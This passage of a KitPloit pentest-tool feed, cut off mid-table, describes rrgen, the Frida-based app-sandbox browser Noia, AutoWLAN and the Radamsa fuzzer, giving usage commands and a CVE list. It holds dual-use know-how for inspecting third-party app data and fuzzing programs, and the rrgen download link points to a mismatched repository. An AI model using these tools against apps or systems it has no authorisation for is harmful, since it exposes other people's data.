tag:blogger.com,1999:blog-83172222311336605472024-03-28T11:12:15.685-03:00KitPloit - PenTest & Hacking ToolsKitPloit - leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security β£Unknownnoreply@blogger.comBlogger5862125tag:blogger.com,1999:blog-8317222231133660547.post-55426343590268805292024-03-28T08:30:00.001-03:002024-03-28T08:30:00.162-03:00Rrgen - A Header Only C++ Library For Storing Safe, Randomly Generated Data Into Modern Containers<p align="center"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEimHvuKh7PZC2Snz-JxPjI6EAeTw5tkfSU9DXgr0iTvQft6SX25W0EstSsonJtcS8ygefOH13suD_DhS8nTyCU7BJlJyYNTXD9DlkcHY3zH_gpjIl9CTJUUb8NyquGhERs2ImmfVufbwk3bja1s4RB_qEonvWX2roGV5PDagXHTVL9oZ_EoQ9Z6HNB0pCbe"><img alt="" border="0" height="183" id="BLOGGER_PHOTO_ID_7349970944757009890" src="https://blogger.googleusercontent.com/img/a/AVvXsEimHvuKh7PZC2Snz-JxPjI6EAeTw5tkfSU9DXgr0iTvQft6SX25W0EstSsonJtcS8ygefOH13suD_DhS8nTyCU7BJlJyYNTXD9DlkcHY3zH_gpjIl9CTJUUb8NyquGhERs2ImmfVufbwk3bja1s4RB_qEonvWX2roGV5PDagXHTVL9oZ_EoQ9Z6HNB0pCbe=w400-h183" width="400" /></a></p><p align="center"><br /></p> <p>This <a href="https://www.kitploit.com/search/label/Library" target="_blank" title="library">library</a> was developed to combat insecure methods of storing random data into modern <a href="https://www.kitploit.com/search/label/C++" target="_blank" title="C++">C++</a> containers. For example, old and clunky PRNGs. Thus, rrgen uses STL's <a href="https://www.kitploit.com/search/label/Distribution" target="_blank" title="distribution">distribution</a> engines in order to efficiently and safely store a random number <a href="https://www.kitploit.com/search/label/Distribution" target="_blank" title="distribution">distribution</a> into a given <a href="https://www.kitploit.com/search/label/C++" target="_blank" title="C++">C++</a> container. </p><span><a name='more'></a></span><p><br /></p> <h2>Installation</h2> <p>1) <code>git clone https://github.com/josh0xA/rrgen.git</code> <br /> 2) <code>cd rrgen</code><br /> 3) <code>make</code><br /> 4) Add <code>include/rrgen.hpp</code> to your project tree for <a href="https://www.kitploit.com/search/label/Access" target="_blank" title="access">access</a> to the library classes and functions.<br /></p> <h2>Official Documentation</h2> <p><em>rrgen/docs/index.rst</em></p> <h2>Supported Containers</h2> <p>1) <code>std::vector<></code><br /> 2) <code>std::list<></code><br /> 3) <code>std::array<></code><br /> 4) <code>std::stack<></code><br /></p> <h2>Example Usages</h2> <pre><code>#include "../include/rrgen.hpp"<br />#include <iostream><br /><br />int main(void)<br />{<br /> // Example usage for rrgen vector<br /> rrgen::rrand<float, std::vector, 10> rrvec;<br /> rrvec.gen_rrvector(false, true, 0, 10);<br /> for (auto &i : rrvec.contents())<br /> {<br /> std::cout << i << " ";<br /> } // ^ the same as rrvec.show_contents()<br /><br /> // Example usage for rrgen list (frontside insertion)<br /> rrgen::rrand<int, std::list, 10> rrlist;<br /> rrlist.gen_rrlist(false, true, "fside", 5, 25);<br /> std::cout << '\n'; rrlist.show_contents();<br /> std::cout << "Size: " << rrlist.contents().size() << '\n';<br /><br /> // Example usage for rrgen array<br /> rrgen::rrand_array<int, 5> rrarr;<br /> rrarr.gen_rrarray(false, true, 5, 35);<br /> for (auto &i : rrarr.contents())<br /> {<br /> std::cout << i << " ";<br /> } // ^ the same as rrarr. show_contents()<br /><br /> // Example usage for rrgen stack <br /> rrgen::rrand_stack<float, 10> rrstack;<br /> rrstack.gen_rrstack(false, true, 200, 1000);<br /> for (auto m = rrstack.xsize(); m > 0; m--)<br /> {<br /> std::cout << rrstack.grab_top() << " ";<br /> rrstack.pop_off();<br /> if (m == 1) { std::cout << '\n'; }<br /> } <br />}<br /></code></pre> <p>Note: This is a transferred repository, from a completely unrelated project.</p><p><br /></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/josh0xA/Scylla" rel="nofollow" target="_blank" title="Download Rrgen">Download Rrgen</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-20470298574308943292024-03-27T08:30:00.001-03:002024-03-27T19:29:06.458-03:00Noia - Simple Mobile Applications Sandbox File Browser Tool<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC8Mic5mTtWtbookhqvM4wYy_oL2OSDQ2-5QSIka9CYaEJaGbtdxt4kPnwqqFu1LDgqP-lk_B2fVkyGAnN-F3_xT5PqJVI4OfCrcgbpQYpAYE7n9EhJ9Ww_FzrowhItg9siRFpOUVTw4b5P6c4_1xI3FvGY9F5VOeH6MzTUhPyudEBv7EBY6uawVYdX0x0/s1002/noia_3_demo.gif" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="666" data-original-width="1002" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC8Mic5mTtWtbookhqvM4wYy_oL2OSDQ2-5QSIka9CYaEJaGbtdxt4kPnwqqFu1LDgqP-lk_B2fVkyGAnN-F3_xT5PqJVI4OfCrcgbpQYpAYE7n9EhJ9Ww_FzrowhItg9siRFpOUVTw4b5P6c4_1xI3FvGY9F5VOeH6MzTUhPyudEBv7EBY6uawVYdX0x0/w640-h426/noia_3_demo.gif" width="640" /></a></p><p><br /></p> <p>Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications <a href="https://www.kitploit.com/search/label/Sandbox" target="_blank" title="sandbox">sandbox</a> and directly previewing SQLite databases, images, and more. Powered by <a href="https://www.frida.re" rel="nofollow" target="_blank" title="frida.re">frida.re</a>.</p> <p>Please note that I'm not a programmer, but I'm probably above the median in code-savyness. Try it out, open an issue if you find any problems. PRs are welcome.</p><span><a name='more'></a></span><p><br /></p> <h2>Installation & Usage</h2> <pre><code>npm install -g noia<br />noia<br /></code></pre> <h3>Features</h3> <ul> <li> <p>Explore third-party applications files and directories. Noia shows you details including the <a href="https://www.kitploit.com/search/label/Access" target="_blank" title="access">access</a> permissions, file type and much more.</p> </li> <li> <p>View custom <a href="https://www.kitploit.com/search/label/Binary" target="_blank" title="binary">binary</a> files. Directly preview SQLite databases, images, and more.</p> </li> <li> <p>Search application by name.</p> </li> <li> <p>Search files and directories by name.</p> </li> <li> <p>Navigate to a custom <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> using the <kbd>ctrl+g</kbd> shortcut.</p> </li> <li> <p>Download the application files and directories for further analysis.</p> </li> <li> <p>Basic iOS support</p> </li> </ul> <p>and more</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC8Mic5mTtWtbookhqvM4wYy_oL2OSDQ2-5QSIka9CYaEJaGbtdxt4kPnwqqFu1LDgqP-lk_B2fVkyGAnN-F3_xT5PqJVI4OfCrcgbpQYpAYE7n9EhJ9Ww_FzrowhItg9siRFpOUVTw4b5P6c4_1xI3FvGY9F5VOeH6MzTUhPyudEBv7EBY6uawVYdX0x0/s1002/noia_3_demo.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="666" data-original-width="1002" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC8Mic5mTtWtbookhqvM4wYy_oL2OSDQ2-5QSIka9CYaEJaGbtdxt4kPnwqqFu1LDgqP-lk_B2fVkyGAnN-F3_xT5PqJVI4OfCrcgbpQYpAYE7n9EhJ9Ww_FzrowhItg9siRFpOUVTw4b5P6c4_1xI3FvGY9F5VOeH6MzTUhPyudEBv7EBY6uawVYdX0x0/w640-h426/noia_3_demo.gif" width="640" /></a></div><p><br /></p> <h2>Setup</h2> <h3>Desktop requirements:</h3> <ul> <li><a href="https://nodejs.org/" rel="nofollow" target="_blank" title="node.js">node.js</a> <strong>LTS</strong> and <a href="https://www.npmjs.com" rel="nofollow" target="_blank" title="npm">npm</a></li> <li>Any decent modern desktop browser</li> </ul> <p>Noia is available on npm, so just type the following command to install it and run it:</p> <pre><code>npm install -g noia<br />noia<br /></code></pre> <h3>Device setup:</h3> <p>Noia is powered by <a href="https://www.frida.re" rel="nofollow" target="_blank" title="frida.re">frida.re</a>, thus requires Frida to run.</p> <h4>Rooted Device</h4> <p>See: * https://frida.re/docs/android/ * https://frida.re/docs/ios/</p> <h4>Non-rooted Device</h4> <ul> <li>https://koz.io/using-frida-on-android-without-root/</li> <li>https://github.com/sensepost/objection/wiki/Patching-Android-Applications</li> <li>https://nowsecure.com/blog/2020/01/02/how-to-conduct-jailed-testing-with-frida/</li> </ul> <p><strong>Security Warning</strong></p> <p>This tool is not secure and may include some security <a href="https://www.kitploit.com/search/label/vulnerabilities" target="_blank" title="vulnerabilities">vulnerabilities</a> so make sure to isolate the webpage from potential hackers.</p> <h2>LICENCE</h2> <p>MIT</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/0x742/noia" rel="nofollow" target="_blank" title="Download Noia">Download Noia</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-25376749267468000822024-03-26T08:30:00.011-03:002024-03-26T08:30:00.146-03:00AutoWLAN - Run A Portable Access Point On A Raspberry Pi Making Use Of Docker Containers<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjXeaF5MXK2ti54OpzyTmnxSBjJCv01O1h5s2e47KgqMyf1B2uJah3SNlgxHyIAo9C5CP8KVgOgqbbLdEa7WwTMz5hHRE12aeWqMonC78TEXU7BnnJ_pou9YHvx1pbw32PySusvOh_MZ9scrqDVa3muPyPL8PnYrLGFtIeXefEImlf-k5aoJa4WLrwNLQ1T"><img alt="" border="0" height="368" id="BLOGGER_PHOTO_ID_7349417525795027954" src="https://blogger.googleusercontent.com/img/a/AVvXsEjXeaF5MXK2ti54OpzyTmnxSBjJCv01O1h5s2e47KgqMyf1B2uJah3SNlgxHyIAo9C5CP8KVgOgqbbLdEa7WwTMz5hHRE12aeWqMonC78TEXU7BnnJ_pou9YHvx1pbw32PySusvOh_MZ9scrqDVa3muPyPL8PnYrLGFtIeXefEImlf-k5aoJa4WLrwNLQ1T=w640-h368" width="640" /></a></p> <p><br /></p><p>This project will allow you run a portable <a href="https://www.kitploit.com/search/label/Access" target="_blank" title="access">access</a> point on a Raspberry Pi making use of <em>Docker</em> containers. </p> <p>Further reference and explanations: </p> <p><a href="https://fwhibbit.es/en/automatic-access-point-with-docker-and-raspberry-pi-zero-w" rel="nofollow" target="_blank" title="https://fwhibbit.es/en/automatic-access-point-with-docker-and-raspberry-pi-zero-w">https://fwhibbit.es/en/automatic-access-point-with-docker-and-raspberry-pi-zero-w</a></p> <p>Tested on Raspberry Pi Zero W.</p><span><a name='more'></a></span><p><br /></p> <h3>Access point configurations</h3> <p>You can customize the network password and other <a href="https://www.kitploit.com/search/label/Configuration" target="_blank" title="configuration">configuration</a>s on files at <em>confs/hostapd_confs/</em>. You can also add your own <em>hostapd</em> <a href="https://www.kitploit.com/search/label/Configuration" target="_blank" title="configuration">configuration</a> files here. </p> <h3>Management using plain docker</h3> <p>Add <em>--rm</em> for volatile containers. </p> <h5>Create and run a container with default (Open) configuration (stop with Ctrl+C)</h5> <pre><code>docker run --name autowlan_open --cap-add=NET_ADMIN --network=host autowlan<br /></code></pre> <h5>Create and run a container with WEP configuration (stop with Ctrl+C)</h5> <pre><code>docker run --name autowlan_wep --cap-add=NET_ADMIN --network=host -v $(pwd)/confs/hostapd_confs/wep.conf:/etc/hostapd/hostapd.conf autowlan<br /></code></pre> <h5>Create and run a container with WPA2 configuration (stop with Ctrl+C)</h5> <pre><code>docker run --name autowlan_wpa2 --cap-add=NET_ADMIN --network=host -v $(pwd)/confs/hostapd_confs/wpa2.conf:/etc/hostapd/hostapd.conf autowlan<br /></code></pre> <h5>Stop a running container</h5> <pre><code>docker stop autowlan_{open|wep|wpa2}<br /></code></pre> <h3>Management using docker-compose</h3> <h5>Create and run container (stop with Ctrl+C)</h5> <pre><code>docker-compose -f <fichero_yml> up<br /></code></pre> <h5>Create and run container in the background</h5> <pre><code>docker-compose -f <fichero_yml> up -d<br /></code></pre> <h5>Stop a container in the background</h5> <pre><code>docker-compose -f <fichero_yml> down<br /></code></pre> <h5>Read logs of a container in the background</h5> <pre><code>docker-compose -f <fichero_yml> logs<br /></code></pre><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://gitlab.com/hartek/autowlan" rel="nofollow" target="_blank" title="Download AutoWLAN">Download AutoWLAN</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-11292713982769295672024-03-25T08:30:00.001-03:002024-03-25T08:30:00.140-03:00Radamsa - A General-Purpose Fuzzer<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRv8MmX1kSllNTxyjH3saj4jONdFKC1DJWtLM-g-D4vQGEeIfuAefGzOxlGfNNEawkikO4O5uae5faHyWo0wowKD5MNye97m4uzOEXh1O0TTTbddHuqA-eV64URVkIeF-9fQj5EB5U6pWU2RPJFHaA7RtGb0k9u-8uukwovtef3R6WKqTi-8bUawEkqPq7/s896/Radamsa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="512" data-original-width="896" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRv8MmX1kSllNTxyjH3saj4jONdFKC1DJWtLM-g-D4vQGEeIfuAefGzOxlGfNNEawkikO4O5uae5faHyWo0wowKD5MNye97m4uzOEXh1O0TTTbddHuqA-eV64URVkIeF-9fQj5EB5U6pWU2RPJFHaA7RtGb0k9u-8uukwovtef3R6WKqTi-8bUawEkqPq7/w640-h366/Radamsa.png" width="640" /></a></div><p><br /></p> <p>Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestringly different outputs from them. The main selling points of radamsa are that it has already found a slew of bugs in programs that actually matter, it is easily scriptable and, easy to get up and running.</p><span><a name='more'></a></span><p><br /></p> <h2>Nutshell:</h2> <pre><code> $ # please please please fuzz your programs. here is one way to get data for it:<br /> $ sudo apt-get install gcc make git wget<br /> $ git clone https://gitlab.com/akihe/radamsa.git && cd radamsa && make && sudo make install<br /> $ echo "HAL 9000" | radamsa<br /></code></pre> <h2>What the Fuzz</h2> <p>Programming is hard. All nontrivial programs have bugs in them. What's more, even the simplest typical mistakes are in some of the most widely used programming languages usually enough for attackers to gain undesired powers.</p> <p>Fuzzing is one of the techniques to find such unexpected behavior from programs. The idea is simply to subject the program to various kinds of inputs and see what happens. There are two parts in this process: getting the various kinds of inputs and how to see what happens. Radamsa is a solution to the first part, and the second part is typically a short shell script. Testers usually have a more or less vague idea what should <em>not</em> happen, and they try to find out if this is so. This kind of testing is often referred to as negative testing, being the opposite of positive unit- or integration testing. Developers know a service should not crash, should not consume exponential amounts of memory, should not get stuck in an infinite loop, etc. Attackers know that they can probably turn certain kinds of memory safety bugs into exploits, so they fuzz typically instrumented versions of the target programs and wait for such errors to be found. In theory, the idea is to counterprove by finding a counterexample a theorem about the program stating that for all inputs something doesn't happen.</p> <p></p><p>There are many kinds of fuzzers and ways to apply them. Some trace the target program and generate test cases based on the behavior. Some need to know the format of the data and generate test cases based on that <a href="https://www.kitploit.com/search/label/Information" target="_blank" title="information">information</a>. Radamsa is an extremely "black-box" fuzzer, because it needs no <a href="https://www.kitploit.com/search/label/Information" target="_blank" title="information">information</a> about the program nor the format of the data. One can pair it with coverage analysis during testing to likely improve the quality of the sample set during a continuous test run, but this is not mandatory. The main goal is to first get tests running easily, and then refine the technique applied if necessary.</p> <p>Radamsa is intended to be a good general purpose fuzzer for all kinds of data. The goal is to be able to find issues no matter what kind of data the program processes, whether it's xml or mp3, and conversely that not finding bugs implies that other similar tools likely won't find them either. This is accomplished by having various kinds of heuristics and change patterns, which are varied during the tests. Sometimes there is just one change, sometimes there a slew of them, sometimes there are bit flips, sometimes something more advanced and novel.</p> <p>Radamsa is a side-product of OUSPG's Protos Genome Project, in which some techniques to automatically analyze and examine the structure of communication protocols were explored. A subset of one of the tools turned out to be a surprisingly effective file fuzzer. The first prototype black-box fuzzer tools mainly used regular and context-free formal languages to represent the inferred model of the data.</p> <h2>Requirements</h2> <p>Supported operating systems: * GNU/Linux * OpenBSD * FreeBSD * Mac OS X * Windows (using Cygwin)</p> <p></p><p>Software <a href="https://www.kitploit.com/search/label/Requirements" target="_blank" title="requirements">requirements</a> for building from sources: * gcc / clang * make * git * wget</p> <h2>Building Radamsa</h2> <pre><code> $ git clone https://gitlab.com/akihe/radamsa.git<br /> $ cd radamsa<br /> $ make<br /> $ sudo make install # optional, you can also just grab bin/radamsa<br /> $ radamsa --help<br /></code></pre> <p>Radamsa itself is just a single binary file which has no external dependencies. You can move it where you please and remove the rest.</p> <h2>Fuzzing with Radamsa</h2> <p>This section assumes some familiarity with UNIX scripting.</p> <p>Radamsa can be thought as the cat UNIX tool, which manages to break the data in often interesting ways as it flows through. It has also support for generating more than one output at a time and acting as a TCP server or client, in case such things are needed.</p> <p></p><p>Use of radamsa will be demonstrated by means of small examples. We will use the bc arbitrary precision <a href="https://www.kitploit.com/search/label/Calculator" target="_blank" title="calculator">calculator</a> as an example target program.</p> <p>In the simplest case, from scripting point of view, radamsa can be used to fuzz data going through a pipe.</p> <pre><code> $ echo "aaa" | radamsa<br /> aaaa<br /></code></pre> <p>Here radamsa decided to add one 'a' to the input. Let's try that again.</p> <pre><code> $ echo "aaa" | radamsa<br /> Λaaa<br /></code></pre> <p>Now we got another result. By default radamsa will grab a random seed from /dev/urandom if it is not given a specific random state to start from, and you will generally see a different result every time it is started, though for small inputs you might see the same or the original fairly often. The random state to use can be given with the -s parameter, which is followed by a number. Using the same random state will result in the same data being generated.</p> <pre><code> $ echo "Fuzztron 2000" | radamsa --seed 4<br /> Fuzztron 4294967296<br /></code></pre> <p>This particular example was chosen because radamsa happens to choose to use a number mutator, which replaces textual numbers with something else. Programmers might recognize why for example this particular number might be an interesting one to test for.</p> <p>You can generate more than one output by using the -n parameter as follows:</p> <pre><code> $ echo "1 + (2 + (3 + 4))" | radamsa --seed 12 -n 4<br /> 1 + (2 + (2 + (3 + 4?)<br /> 1 + (2 + (3 +?4))<br /> 18446744073709551615 + 4)))<br /> 1 + (2 + (3 + 170141183460469231731687303715884105727))<br /></code></pre> <p>There is no guarantee that all of the outputs will be unique. However, when using nontrivial samples, equal outputs tend to be extremely rare.</p> <p>What we have so far can be used to for example test programs that read input from standard input, as in</p> <pre><code> $ echo "100 * (1 + (2 / 3))" | radamsa -n 10000 | bc<br /> [...]<br /> (standard_in) 1418: illegal character: ^_<br /> (standard_in) 1422: syntax error<br /> (standard_in) 1424: syntax error<br /> (standard_in) 1424: memory exhausted<br /> [hang]<br /></code></pre> <p>Or the compiler used to compile Radamsa:</p> <pre><code> $ echo '((lambda (x) (+ x 1)) #x124214214)' | radamsa -n 10000 | ol<br /> [...]<br /> > What is 'Γ³ Β΅'? <br /> 4901126677<br /> > $<br /></code></pre> <p>Or to test decompression:</p> <pre><code> $ gzip -c /bin/bash | radamsa -n 1000 | gzip -d > /dev/null<br /></code></pre> <p>Typically however one might want separate runs for the program for each output. Basic shell scripting makes this easy. Usually we want a test script to run continuously, so we'll use an infinite loop here:</p> <pre><code> $ gzip -c /bin/bash > sample.gz<br /> $ while true; do radamsa sample.gz | gzip -d > /dev/null; done<br /></code></pre> <p>Notice that we are here giving the sample as a file instead of running Radamsa in a pipe. Like cat Radamsa will by default write the output to stdout, but unlike cat when given more than one file it will usually use only one or a few of them to create one output. This test will go about throwing fuzzed data against gzip, but doesn't care what happens then. One simple way to find out if something bad happened to a (simple single-threaded) program is to check whether the exit value is greater than 127, which would indicate a fatal program termination. This can be done for example as follows:</p> <pre><code> $ gzip -c /bin/bash > sample.gz<br /> $ while true<br /> do<br /> radamsa sample.gz > fuzzed.gz<br /> gzip -dc fuzzed.gz > /dev/null<br /> test $? -gt 127 && break<br /> done<br /></code></pre> <p>This will run for as long as it takes to crash gzip, which hopefully is no longer even possible, and the fuzzed.gz can be used to check the issue if the script has stopped. We have found a few such cases, the last one of which took about 3 months to find, but all of them have as usual been filed as bugs and have been promptly fixed by the upstream.</p> <p>One thing to note is that since most of the outputs are based on data in the given samples (standard input or files given at command line) it is usually a good idea to try to find good samples, and preferably more than one of them. In a more real-world test script radamsa will usually be used to generate more than one output at a time based on tens or thousands of samples, and the consequences of the outputs are tested mostly in parallel, often by giving each of the output on command line to the target program. We'll make a simple such script for bc, which accepts files from command line. The -o flag can be used to give a file name to which radamsa should write the output instead of standard output. If more than one output is generated, the path should have a %n in it, which will be expanded to the number of the output.</p> <pre><code> $ echo "1 + 2" > sample-1<br /> $ echo "(124 % 7) ^ 1*2" > sample-2<br /> $ echo "sqrt((1 + length(10^4)) * 5)" > sample-3<br /> $ bc sample-* < /dev/null<br /> 3<br /> 10<br /> 5<br /> $ while true<br /> do<br /> radamsa -o fuzz-%n -n 100 sample-*<br /> bc fuzz-* < /dev/null<br /> test $? -gt 127 && break<br /> done<br /></code></pre> <p>This will again run up to obviously interesting times indicated by the large exit value, or up to the target program getting stuck.</p> <p>In practice many programs fail in unique ways. Some common ways to catch obvious errors are to check the exit value, enable fatal signal printing in kernel and checking if something new turns up in dmesg, run a program under strace, gdb or valgrind and see if something interesting is caught, check if an error reporter process has been started after starting the program, etc.</p> <h2>Output Options</h2> <p>The examples above all either wrote to standard output or files. One can also ask radamsa to be a TCP client or server by using a special parameter to -o. The output patterns are:</p> <table> <thead> <tr> <th>-o argument</th> <th>meaning</th> <th>example</th> </tr> </thead> <tbody> <tr> <td>:port</td> <td>act as a TCP server in given port</td> <td># radamsa -o :80 -n inf samples/*.http-resp</td> </tr> <tr> <td>ip:port</td> <td>connect as TCP client to port of ip</td> <td>$ radamsa -o 127.0.0.1:80 -n inf samples/*.http-req</td> </tr> <tr> <td>-</td> <td>write to stdout</td> <td>$ radamsa -o - samples/*.vt100</td> </tr> <tr> <td>path</td> <td>write to files, %n is testcase # and %s the first suffix</td> <td>$ radamsa -o test-%n.%s -n 100 samples/*.foo</td> </tr> </tbody> </table> <p>Remember that you can use e.g. tcpflow to record TCP traffic to files, which can then be used as samples for radamsa.</p> <h2>Related Tools</h2> <p>A non-exhaustive list of free complementary tools:</p> <ul> <li>GDB (http://www.gnu.org/software/gdb/)</li> <li>Valgrind (http://valgrind.org/)</li> <li>AddressSanitizer (http://code.google.com/p/address-sanitizer/wiki/AddressSanitizer)</li> <li>strace (http://sourceforge.net/projects/strace/)</li> <li>tcpflow (http://www.circlemud.org/~jelson/software/tcpflow/)</li> </ul> <p>A non-exhaustive list of related free tools: * American fuzzy lop (http://lcamtuf.coredump.cx/afl/) * Zzuf (http://caca.zoy.org/wiki/zzuf) * Bunny the Fuzzer (http://code.google.com/p/bunny-the-fuzzer/) * Peach (http://peachfuzzer.com/) * Sulley (http://code.google.com/p/sulley/)</p> <p>Tools which are intended to improve security are usually complementary and should be used in parallel to improve the results. Radamsa aims to be an easy-to-set-up general purpose shotgun test to expose the easiest (and often severe due to being reachable from via input streams) cracks which might be exploitable by getting the program to process malicious data. It has also turned out to be useful for catching regressions when combined with continuous automatic testing.</p> <h2>Some Known Results</h2> <p>A robustness testing tool is obviously only good only if it really can find non-trivial issues in real-world programs. Being a University-based group, we have tried to formulate some more scientific approaches to define what a 'good fuzzer' is, but real users are more likely to be interested in whether a tool has found something useful. We do not have anyone at OUSPG running tests or even developing Radamsa full-time, but we obviously do make occasional test-runs, both to assess the usefulness of the tool, and to help improve robustness of the target programs. For the test-runs we try to select programs that are mature, useful to us, widely used, and, preferably, open source and/or tend to process data from outside sources.</p> <p>The list below has some CVEs we know of that have been found by using Radamsa. Some of the results are from our own test runs, and some have been kindly provided by CERT-FI from their tests and other users. As usual, please note that CVE:s should be read as 'product X is now more robust (against Y)'.</p> <table> <thead> <tr> <th>CVE</th> <th>program</th> <th>credit</th> </tr> </thead> <tbody> <tr> <td>CVE-2007-3641</td> <td>libarchive</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2007-3644</td> <td>libarchive</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2007-3645</td> <td>libarchive</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2008-1372</td> <td>bzip2</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2008-1387</td> <td>ClamAV</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2008-1412</td> <td>F-Secure</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2008-1837</td> <td>ClamAV</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2008-6536</td> <td>7-zip</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2008-6903</td> <td>Sophos Anti-Virus</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2010-0001</td> <td>Gzip</td> <td>integer underflow in unlzw</td> </tr> <tr> <td>CVE-2010-0192</td> <td>Acroread</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2010-1205</td> <td>libpng</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2010-1410</td> <td>Webkit</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2010-1415</td> <td>Webkit</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2010-1793</td> <td>Webkit</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2010-2065</td> <td>libtiff</td> <td>found by CERT-FI</td> </tr> <tr> <td>CVE-2010-2443</td> <td>libtiff</td> <td>found by CERT-FI</td> </tr> <tr> <td>CVE-2010-2597</td> <td>libtiff</td> <td>found by CERT-FI</td> </tr> <tr> <td>CVE-2010-2482</td> <td>libtiff</td> <td>found by CERT-FI</td> </tr> <tr> <td>CVE-2011-0522</td> <td>VLC</td> <td>found by Harry Sintonen</td> </tr> <tr> <td>CVE-2011-0181</td> <td>Apple ImageIO</td> <td>found by Harry Sintonen</td> </tr> <tr> <td>CVE-2011-0198</td> <td>Apple Type Services</td> <td>found by Harry Sintonen</td> </tr> <tr> <td>CVE-2011-0205</td> <td>Apple ImageIO</td> <td>found by Harry Sintonen</td> </tr> <tr> <td>CVE-2011-0201</td> <td>Apple CoreFoundation</td> <td>found by Harry Sintonen</td> </tr> <tr> <td>CVE-2011-1276</td> <td>Excel</td> <td>found by Nicolas GrΓ©goire of Agarri</td> </tr> <tr> <td>CVE-2011-1186</td> <td>Chrome</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2011-1434</td> <td>Chrome</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2011-2348</td> <td>Chrome</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2011-2804</td> <td>Chrome/pdf</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2011-2830</td> <td>Chrome/pdf</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2011-2839</td> <td>Chrome/pdf</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2011-2861</td> <td>Chrome/pdf</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2011-3146</td> <td>librsvg</td> <td>found by Sauli Pahlman</td> </tr> <tr> <td>CVE-2011-3654</td> <td>Mozilla Firefox</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2011-3892</td> <td>Theora</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2011-3893</td> <td>Chrome</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2011-3895</td> <td>FFmpeg</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2011-3957</td> <td>Chrome</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2011-3959</td> <td>Chrome</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2011-3960</td> <td>Chrome</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2011-3962</td> <td>Chrome</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2011-3966</td> <td>Chrome</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2011-3970</td> <td>libxslt</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2012-0449</td> <td>Firefox</td> <td>found by Nicolas GrΓ©goire of Agarri</td> </tr> <tr> <td>CVE-2012-0469</td> <td>Mozilla Firefox</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2012-0470</td> <td>Mozilla Firefox</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2012-0457</td> <td>Mozilla Firefox</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2012-2825</td> <td>libxslt</td> <td>found by Nicolas GrΓ©goire of Agarri</td> </tr> <tr> <td>CVE-2012-2849</td> <td>Chrome/GIF</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2012-3972</td> <td>Mozilla Firefox</td> <td>found by Nicolas GrΓ©goire of Agarri</td> </tr> <tr> <td>CVE-2012-1525</td> <td>Acrobat Reader</td> <td>found by Nicolas GrΓ©goire of Agarri</td> </tr> <tr> <td>CVE-2012-2871</td> <td>libxslt</td> <td>found by Nicolas GrΓ©goire of Agarri</td> </tr> <tr> <td>CVE-2012-2870</td> <td>libxslt</td> <td>found by Nicolas GrΓ©goire of Agarri</td> </tr> <tr> <td>CVE-2012-2870</td> <td>libxslt</td> <td>found by Nicolas GrΓ©goire of Agarri</td> </tr> <tr> <td>CVE-2012-4922</td> <td>tor</td> <td>found by the Tor project</td> </tr> <tr> <td>CVE-2012-5108</td> <td>Chrome</td> <td>OUSPG via NodeFuzz</td> </tr> <tr> <td>CVE-2012-2887</td> <td>Chrome</td> <td>OUSPG via NodeFuzz</td> </tr> <tr> <td>CVE-2012-5120</td> 